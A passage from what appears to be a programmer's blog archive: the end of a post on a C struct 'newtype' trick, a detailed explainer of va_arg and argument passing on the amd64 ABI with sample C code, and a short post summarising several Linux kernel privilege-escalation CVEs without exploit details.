Because the types have identical representations, you can safely serialize your structs and exchange them between code compiled with either version. On amd64, you can probably even call between compilation units defined either way.

The next time you're writing some subtle C code that has to deal with multiple types with the same representation, I encourage you to consider using this trick.


I didn't invent this trick, although as far as I know the NEWTYPE macro is my own invention. (Edited to add: A commenter points out that I'm not the first to use the newtype name in C, although I think I prefer my implementation.)

I learned this trick from the Linux kernel, which uses it for a very similar application: distinguishing entries in the different levels of the x86 page tables. page.h on amd64 includes the following definitions (taken from an old version, but the current version has equivalent ones):

/*
 * These are used to make use of C type-checking..
 */
typedef struct { unsigned long pte; } pte_t;
typedef struct { unsigned long pmd; } pmd_t;
typedef struct { unsigned long pud; } pud_t;
typedef struct { unsigned long pgd; } pgd_t;

I claimed above that the struct and the bare type will have the same alignment and padding. I don't believe this is guaranteed by C99, but the SysV amd64 and i386 ABI specifications both require:

Structures and unions assume the alignment of their most strictly aligned component. Each member is assigned to the lowest available offset with the appropriate alignment. The size of any object is always a multiple of the object’s alignment.

(text quoted from the amd64 document, but the i386 one is almost identical).

And C99 requires (§6.7.2.1 para 13):

… A pointer to a structure object, suitably converted, points to its initial member (or if that member is a bit-field, then to the unit in which it resides), and vice versa. There may be unnamed padding within a structure object, but not at its beginning.

I believe these requirements, taken together, should be enough to ensure that the struct and the bare type will have the same representation.

Amd64 and Va_arg

A while back, I was poking around LLVM bugs, and discovered, to my surprise, that LLVM doesn't support the va_arg intrinsic, which variadic functions use to accept a variable number of arguments, at all on amd64. It turns out that clang and llvm-gcc, the compilers that use LLVM as a backend, implement va_arg themselves in the frontend, so this isn't as big a deal as it might sound, but it was still a surprise to me.

Figuring that this might just be something no one had gotten around to, and couldn't actually be that hard, I pulled out my copy of the amd64 ABI specification, thinking that maybe I could throw together a patch and fix the issue.

Maybe half an hour of reading later, I stopped in terror and gave up, repenting of my foolish ways to go work on something else. va_arg on amd64 is a hairy, hairy beast, and probably not something I was going to hack together in an evening. And so instead I decided to blog about it.

The problem: Argument passing on amd64

On i386, because of the dearth of general-purpose registers, the calling convention passes all arguments on the stack. This makes the va_arg implementation easy – A va_list is simply a pointer into the stack, and va_arg just adds the size of the type to be retrieved to the va_list, and returns the old value. In fact, the i386 ABI reference simply specifies va_arg in terms of a single line of code:

#define va_arg(list, mode) ((mode *)(list = (char *)list + sizeof(mode)))[-1]
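
For reference, here's the shape of code these macros have to support; a toy variadic function, with nothing platform-specific about it:

#include <stdarg.h>

/* Toy example: sum `count` int arguments using va_start/va_arg/va_end. */
static int sum_ints(int count, ...)
{
        va_list ap;
        int total = 0;

        va_start(ap, count);
        for (int i = 0; i < count; i++)
                total += va_arg(ap, int);
        va_end(ap);

        return total;
}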

On amd64, the problem is much more complicated. To start, amd64 specifies that up to 6 integer arguments and up to 8 floating-point arguments are passed to functions in registers, to take advantage of amd64's larger number of registers. So, for a start, va_arg will have to deal with the fact that some arguments may have been passed in registers, and some on the stack.

(One could imagine simplifying the problem by stipulating a different calling convention for variadic functions, but unfortunately, for historical reasons and otherwise, C requires that code be able to call functions even if their prototype is not visible, which means the compiler doesn't necessarily know if it's calling a variadic function at any given call site. [edited to add: caf points out in the comments that C99 actually explicitly does not require this property. But I speculate that the ABI designers wanted to preserve this property from i386 because it has historically worked, and so existing code depended on it]).

That's not all, however. Not only can integer arguments be passed by registers, but small structs (16 bytes or fewer) can also be passed in registers. A sufficiently small struct, for the purposes of the calling convention, is essentially broken up into its component members, which are passed as though they were separate arguments – unless only some of them would fit into registers, in which case the whole struct is passed on the stack.

So va_arg, given a struct as an argument, has to be able to figure out whether it was passed in registers or on the stack, and possibly even re-assemble it into temporary space.
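
To make those rules concrete, here's an illustrative example of how I read the ABI's classification:

/* 16 bytes, so eligible for register passing: the long is classified as
 * INTEGER and the double as SSE.  As the first argument, m.l travels in
 * %rdi and m.d in %xmm0; if the right kinds of registers had run out,
 * the entire struct would go on the stack instead. */
struct mixed {
        long   l;
        double d;
};

void takes_mixed(struct mixed m);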

The implementation

Given all those constraints, the required implementation is fairly straightforward, but incredibly complex compared to any other platform I know of.

To start, any function that is known to use va_start is required to, at the start of the function, save all registers that may have been used to pass arguments onto the stack, into the "register save area", for future access by va_start and va_arg. This is an obvious step, and I believe pretty standard on any platform with a register calling convention. The registers are saved as integer registers followed by floating point registers. As an optimization, during a function call, %rax is required to hold the number of SSE registers used to hold arguments, to allow a varargs caller to avoid touching the FPU at all if there are no floating point arguments.

va_list, instead of being a pointer, is a structure that keeps track of four different things:

typedef struct {
  unsigned int gp_offset;
  unsigned int fp_offset;
  void *overflow_arg_area;
  void *reg_save_area;
} va_list[1];

reg_save_area points at the base of the register save area initialized at the start of the function. fp_offset and gp_offset are offsets into that register save area, indicating the next unused floating point and general-purpose register, respectively. Finally, overflow_arg_area points at the next stack-passed argument to the function, for arguments that didn't fit into registers.
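
To make the fields concrete, here's a sketch (mine, not the ABI's wording) of what the compiler-generated va_start has to do for a function whose named arguments consumed n_gp general-purpose registers and n_sse SSE registers:

/* Mirror of the ABI's va_list layout, for illustration only. */
typedef struct {
        unsigned int gp_offset;
        unsigned int fp_offset;
        void *overflow_arg_area;
        void *reg_save_area;
} abi_va_list;

/* The GP portion of the register save area is 6 * 8 = 48 bytes; each
 * saved SSE register occupies a 16-byte slot after it. */
static void sketch_va_start(abi_va_list *ap, unsigned n_gp, unsigned n_sse,
                            void *first_stack_arg, void *save_area)
{
        ap->gp_offset         = n_gp * 8;
        ap->fp_offset         = 48 + n_sse * 16;
        ap->overflow_arg_area = first_stack_arg;
        ap->reg_save_area     = save_area;
}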

Here's an ASCII art diagram of the stack frame during the execution of a varargs function, after the register save area has been established. Note that the spec allows a function to put the register save area anywhere in its frame that it wants, so I've shown potential storage both above and below it.

|     ...        |  [high addresses]
|   argument     |
|    passed      |
|  on stack (2)  |
+----------------+  <---- overflow_arg_area
|   argument     |
|    passed      |
|  on stack (1)  |
| return address |
|      ...       | (possible local storage for func)
|     %xmm15     | \
+----------------+  |     
|     %xmm14     |  |     ___
+----------------+  |      |
|      ...       |   \ register
+----------------+    }save|
|     %xmm0      |   / area|
+----------------+  |      |
|      %r9       |  |      |
+----------------+  |      | fp_offset
|      %r8       |  |  ___ |
+----------------+  |   |  |
|      ...       |  |   |  |
+----------------+  |   | gp_offset
|     %rsi       |  |   |  |
+----------------+  |   |  |
|     %rdi       | /    |  |
+----------------+ <----+--+--- reg_save_area
|     ...        | (potentially more storage)
+----------------+ <----------- %esp
|     ...        | [low addresses]

Because va_arg must determine whether the requested type was passed in registers, it needs compiler support, and can't be implemented as a simple macro like on i386. The amd64 ABI reference specifies va_arg using a list of eleven different steps that the macro must perform. I'll try to summarize them here.

First off, va_arg determines whether the requested type could be passed in registers at all. If not, va_arg behaves much like it does on i386, using the overflow_arg_area member of the va_list (plus some extra complexity to handle types with stricter alignment requirements).

Next, assuming the argument can be passed in registers, va_arg determines how many floating-point and general-purpose registers would be needed to pass the requested type. It compares those counts against the gp_offset and fp_offset fields in the va_list. If consuming that many additional registers would run past the end of the corresponding portion of the register save area (in other words, if not enough registers of the right kind were left when the call was made), then the argument was passed on the stack, and va_arg bails out and uses overflow_arg_area.

If we've made it this far, the argument was passed in registers. va_arg fetches the argument using reg_save_area and the appropriate offsets, and then updates gp_offset and fp_offset as appropriate.
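
Stripped of the SSE and aggregate handling, the register-versus-stack decision for a single integer-class argument looks roughly like this, reusing the abi_va_list mirror from the earlier sketch (the real sequence is emitted inline by the compiler):

/* Return the address of the next integer-class argument (int, long,
 * pointer, ...).  The caller reads the value through the pointer. */
static void *next_int_arg(abi_va_list *ap)
{
        if (ap->gp_offset < 6 * 8) {
                /* Passed in a register: it lives in the register save area. */
                void *p = (char *)ap->reg_save_area + ap->gp_offset;
                ap->gp_offset += 8;
                return p;
        }
        /* All six GP registers were used up; the argument is on the stack. */
        void *p = ap->overflow_arg_area;
        ap->overflow_arg_area = (char *)ap->overflow_arg_area + 8;
        return p;
}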

Note that if the argument was passed in a mix of floating-point and general-purpose registers, or requires a large alignment, this means that va_arg must copy it out of the register save area onto temporary space in order to assemble the value.

So, in the worst case, va_arg on a type that embeds both a floating-point and an integer type must do two comparisons, a conditional branch, and then update two fields in the va_list and copy multiple values out of the register save area into a temporary object to return. That's quite a lot more work than the i386 version does. Note that I don't mean to suggest this is a performance concern – I don't have any benchmarks to back this up, but I would be shocked if this is measurable in any reasonable code. But I was surprised by how complex this operation is.

A Brief Look at Linux’s Security Record

After the fuss of the last two weeks because of CVE-2010-3081 and CVE-2010-3301, I decided to take a look at a handful of the high-profile privilege escalation vulnerabilities in Linux from the last few years.

So, here’s a summary of the ones I picked out. There are also a large number of smaller ones, like an AF_CAN exploit, or the l2cap overflow in the Bluetooth subsystem, that didn’t get as much publicity, because they were found more quickly or didn’t affect as many default configurations.

CVE name         Nickname          introduced   fixed       notes
CVE-2007-4573    ptrace            2.4.x        2.6.22.7    64-bit only
CVE-2008-0009    vmsplice (1)
CVE-2008-0600    vmsplice (2)
CVE-2009-2692    sock_sendpage     2.4.x        2.6.31      mmap_min_addr helped 1
CVE-2010-3301    ptrace (redux)                             64-bit only

I’ll probably have some more to say about these bugs in the future, but here’s a few thoughts:

  • At least two of these bugs existed since the 2.4 days. So no matter what kernel you’ve been running, you had privilege escalation bugs you didn’t know about for as long as you were running that kernel. We don’t know whether or not the blackhats knew about them, but are you feeling lucky?
  • I bet there are at least a few more privesc bugs dating back to 2.4 we haven’t found yet.
  • If you run a Linux machine with untrusted local users, or with services that are at risk of being compromised (e.g. your favorite shitty PHP webapp), you’d better have a story for how you’re dealing with these bugs, including the fact that some of them were privately known for years before they were announced.
  • It’s not clear from this sample that the kernel is getting more secure over time. I suspect we’re getting better at finding bugs, particularly now that companies like Google are paying researchers to audit the kernel, but it’s not obvious we’re getting better at not introducing them in the first place. Certainly CVE-2010-3301 is pretty embarrassing, being a reintroduction of a bug that had been fixed seven months previously.


1 mmap_min_addr mitigated this bug to a DoS, but several bugs that allowed attackers to get around that restriction were announced at the same time.

2 The public exploit relies on a call path introduced in 2.6.26, but observers have pointed out the possibility of exploit vectors affecting older kernels.